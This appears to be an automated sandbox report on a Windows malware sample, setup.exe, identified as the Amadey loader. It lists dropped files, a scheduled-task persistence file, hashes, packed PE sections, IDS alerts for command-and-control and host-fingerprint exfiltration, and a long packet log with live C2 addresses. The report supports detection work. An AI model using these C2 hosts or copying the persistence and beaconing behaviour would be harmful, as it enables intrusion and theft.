Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@...........................K..........@.................................W...k.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .0*.........................@...qzeqbxes......0.....................@...qgghuozc......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\wsjctfw

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	239616
Entropy (8bit):	5.775223239867257
Encrypted:	false
SSDEEP:	3072:wLCVEbyN72nmIGJWwJsoh/NtuFV+b877Lqvywr+o/gqMVIwWCe:vabyN7S1GJWg/vEV+Q3LPwioDMl
MD5:	E84A4D01A5798411ECEECA1F08E91AFB
SHA1:	709622D549935F42C3859D11AA5920C1782F32C1
SHA-256:	2F77A81B5D02BFC389B9DC7705FAD1AFFFCA1ADE7BE88AEB96A4630F50C02717
SHA-512:	9C933D40129AB75C67B6ADF29C049055EA58E2E571A4223C03177B3140F93545A8B3298C28D60BFBC86649C56467A2941B29349C4D94C78DA69F5CFADB66B73D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@g.s... ... ... kpQ ... kpd ... kpP `.. .~i ... ... v.. kpU ... kp` ... kpg ... Rich... ........PE..L.....yd............................. ............@..........................@......j...........................................x...................................\...................................@............................................text............................... ..`.rdata...2.......4..................@..@.data........0......................@....cus.........`......................@..@.rufaxu......p......................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.397812320992608
Encrypted:	false
SSDEEP:	6:vEi2VX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0l1Xwl0ut0:R2RDQ1lOmeeDNfXV1At0
MD5:	98CB19817512F0E44F9EF3D022D015BB
SHA1:	202F0264036B716B493A60E51F1DE05DB2FB3F8F
SHA-256:	25BF844785FB9A85A32849DA07E351FF820F126E92E63FAF3E2D523C801C06E4
SHA-512:	CAA5AD6D122B34BD4B9712945445C7CCB7F50476E03EE73ACDFF083665C3EB6CCD1176DAD03EBE047791FD8666D8F4C492BCCD8C820F311944F4B3DA314A4C55
Malicious:	false
Preview:	....1b..5x.@..o..}.WF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................9.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950130111317579
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	setup.exe
File size:	1'898'496 bytes
MD5:	8ef54b7689af3a0fe5028bc42964bb26
SHA1:	debcb0ea69e4330873f281b0d9b34d15fc513abc
SHA256:	78305c8b5e8ead6989a0af09fc6ed8f2ff1b246c0487dfa78fb5b155b554cae9
SHA512:	8b2ee0c290a48f826bacaeaf949d7335b14f65dc8967d0bcb05ad386fda9faf5d6d016d66ce202cd7be202eaf1981b6b17bb60dae33dc085f28aab9be9d3986b
SSDEEP:	49152:5qE17IghRPKUd2LI/WYW+jNTxjgafw8TfzYBgx1ITA:5HdkRnSNTBg2/ug3WA
TLSH:	BB9533E0EBE744BBEDDD5FBB8C468EA3586041035A6B9419A100C93859F7FD54FC82E4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8ad000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FBA2523555Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4abb0c	0x10	qzeqbxes
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4ababc	0x18	qzeqbxes
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	e8d118c68150ddf5dc231eb70848be3a	False	0.9972113419618529	data	7.978158442993088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	e41a963f201b9f60bf53ae07103127e1	False	0.57421875	data	4.566520856348125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a3000	0x200	692cd099c11d135b0bf4aa569f7ab57b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qzeqbxes	0x30e000	0x19e000	0x19de00	de2dee4527fa3c155180e2f120b8d40e	False	0.9941618610314105	data	7.95245066634278	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qgghuozc	0x4ac000	0x1000	0x400	de3f39a88e8816738796b6649ac5d499	False	0.736328125	data	5.840371909990339	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ad000	0x3000	0x2200	b81e4d431abb5a57cfb918c937a29b04	False	0.07042738970588236	DOS executable (COM)	0.8017781032689831	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4abb1c	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T20:58:09.395650+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49715	80	192.168.2.5	185.215.113.16
2024-07-26T20:58:03.708581+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49712	80	192.168.2.5	185.215.113.16
2024-07-26T20:58:50.007651+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49749	80	192.168.2.5	185.215.113.16
2024-07-26T20:58:12.797415+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49718	80	192.168.2.5	185.215.113.16
2024-07-26T20:58:11.653353+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49717	80	192.168.2.5	185.215.113.16
2024-07-26T20:58:26.518117+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49730	80	192.168.2.5	185.215.113.16
2024-07-26T20:58:07.314664+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	80	49712	185.215.113.16	192.168.2.5
2024-07-26T20:57:16.194767+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49704	52.165.165.26	192.168.2.5
2024-07-26T20:58:38.321684+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49739	80	192.168.2.5	185.215.113.16
2024-07-26T20:57:54.255010+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49711	52.165.165.26	192.168.2.5
2024-07-26T20:58:08.093651+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	49714	80	192.168.2.5	185.215.113.16
2024-07-26T20:58:05.845280+0200	TCP	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	49713	443	192.168.2.5	58.65.168.132
2024-07-26T20:58:10.526931+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49716	80	192.168.2.5	185.215.113.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 20:58:02.947463036 CEST	49712	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:02.952599049 CEST	80	49712	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:02.952703953 CEST	49712	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:02.952902079 CEST	49712	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:02.957906961 CEST	80	49712	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:03.708194971 CEST	80	49712	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:03.708580971 CEST	49712	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:03.711478949 CEST	49712	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:03.716878891 CEST	80	49712	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:03.962657928 CEST	80	49712	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:03.962759018 CEST	49712	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:04.409925938 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:04.409997940 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:04.410095930 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:04.428205013 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:04.428225040 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:05.324457884 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:05.324548960 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:05.417294979 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:05.417320013 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:05.418345928 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:05.418427944 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:05.421053886 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:05.468502045 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:05.845319986 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:05.845377922 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:05.845433950 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:05.845470905 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:05.845489025 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:05.845525026 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.051301003 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.051526070 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.052016973 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.052115917 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.053625107 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.053719997 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.099004030 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.099149942 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.265315056 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.265535116 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.265749931 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.265837908 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.266716003 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.266802073 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.266901970 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.266987085 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.267606020 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.267682076 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.268435955 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.268518925 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.313344002 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.313519001 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.314105988 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.314209938 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.561981916 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.562017918 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.562191963 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.562211990 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.562237024 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.562266111 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.562290907 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.562298059 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.562361002 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.562853098 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.562994957 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.563065052 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.563072920 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.563114882 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.563139915 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.567738056 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.567920923 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.567928076 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.568058968 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.568067074 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.568089008 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.568169117 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.568201065 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.568280935 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.568279982 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.568305016 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.568372965 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.570530891 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.570734978 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.570769072 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.570843935 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.570920944 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.570993900 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.587400913 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.587588072 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.588130951 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.588219881 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.588901997 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.588982105 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.588983059 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.589036942 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.589111090 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.589134932 CEST	443	49713	58.65.168.132	192.168.2.5
Jul 26, 2024 20:58:06.589148045 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:06.589190960 CEST	49713	443	192.168.2.5	58.65.168.132
Jul 26, 2024 20:58:07.308762074 CEST	49712	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:07.309279919 CEST	49714	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:07.314568043 CEST	80	49714	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:07.314663887 CEST	80	49712	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:07.314699888 CEST	49714	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:07.314738035 CEST	49712	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:07.315011024 CEST	49714	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:07.319818020 CEST	80	49714	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:08.093255043 CEST	80	49714	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:08.093651056 CEST	49714	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:08.496587038 CEST	49714	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:08.497021914 CEST	49715	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:08.502727032 CEST	80	49715	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:08.502845049 CEST	49715	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:08.519251108 CEST	80	49714	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:08.519321918 CEST	49714	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:08.535871029 CEST	49715	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:08.541501999 CEST	80	49715	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:09.395504951 CEST	80	49715	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:09.395649910 CEST	49715	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:09.396681070 CEST	49715	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:09.401523113 CEST	80	49715	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:09.648875952 CEST	80	49715	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:09.648962021 CEST	49715	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:09.762265921 CEST	49715	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:09.762721062 CEST	49716	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:09.768940926 CEST	80	49716	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:09.768961906 CEST	80	49715	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:09.769057035 CEST	49715	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:09.769104004 CEST	49716	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:09.769277096 CEST	49716	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:09.774362087 CEST	80	49716	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:10.526463032 CEST	80	49716	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:10.526931047 CEST	49716	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:10.527566910 CEST	49716	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:10.532412052 CEST	80	49716	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:10.773087025 CEST	80	49716	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:10.773483038 CEST	49716	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:10.895195007 CEST	49716	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:10.895625114 CEST	49717	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:10.900691032 CEST	80	49717	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:10.900773048 CEST	49717	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:10.901776075 CEST	80	49716	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:10.901835918 CEST	49716	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:10.906624079 CEST	49717	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:10.914593935 CEST	80	49717	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:11.653270006 CEST	80	49717	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:11.653352976 CEST	49717	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:11.654226065 CEST	49717	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:11.659137011 CEST	80	49717	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:11.906245947 CEST	80	49717	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:11.906408072 CEST	49717	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:12.012265921 CEST	49717	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:12.012598038 CEST	49718	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:12.021311998 CEST	80	49718	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:12.021495104 CEST	49718	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:12.021851063 CEST	49718	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:12.026073933 CEST	80	49717	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:12.026175022 CEST	49717	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:12.028448105 CEST	80	49718	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:12.797203064 CEST	80	49718	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:12.797415018 CEST	49718	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:12.798908949 CEST	49718	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:12.803991079 CEST	80	49718	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:13.056782961 CEST	80	49718	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:13.056917906 CEST	49718	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:13.168700933 CEST	49718	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:13.169121981 CEST	49719	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:13.174540997 CEST	80	49719	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:13.175335884 CEST	49719	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:13.175335884 CEST	49719	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:13.180177927 CEST	80	49718	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:13.180268049 CEST	49718	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:13.180377960 CEST	80	49719	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:13.936624050 CEST	80	49719	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:13.936877012 CEST	49719	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:13.940500021 CEST	49719	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:13.945628881 CEST	80	49719	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:14.189428091 CEST	80	49719	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:14.189491987 CEST	49719	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:14.293780088 CEST	49719	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:14.294238091 CEST	49720	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:14.299036980 CEST	80	49720	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:14.299089909 CEST	80	49719	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:14.299104929 CEST	49720	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:14.299137115 CEST	49719	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:14.299314976 CEST	49720	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:14.304092884 CEST	80	49720	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:15.041475058 CEST	80	49720	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:15.041554928 CEST	49720	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:15.042422056 CEST	49720	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:15.047342062 CEST	80	49720	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:15.289223909 CEST	80	49720	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:15.289972067 CEST	49720	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:15.402975082 CEST	49720	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:15.403419971 CEST	49721	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:15.410183907 CEST	80	49721	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:15.410276890 CEST	49721	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:15.410448074 CEST	49721	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:15.413270950 CEST	80	49720	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:15.413456917 CEST	49720	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:15.415338993 CEST	80	49721	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:16.185359955 CEST	80	49721	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:16.185457945 CEST	49721	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:16.192528009 CEST	49721	80	192.168.2.5	185.215.113.16
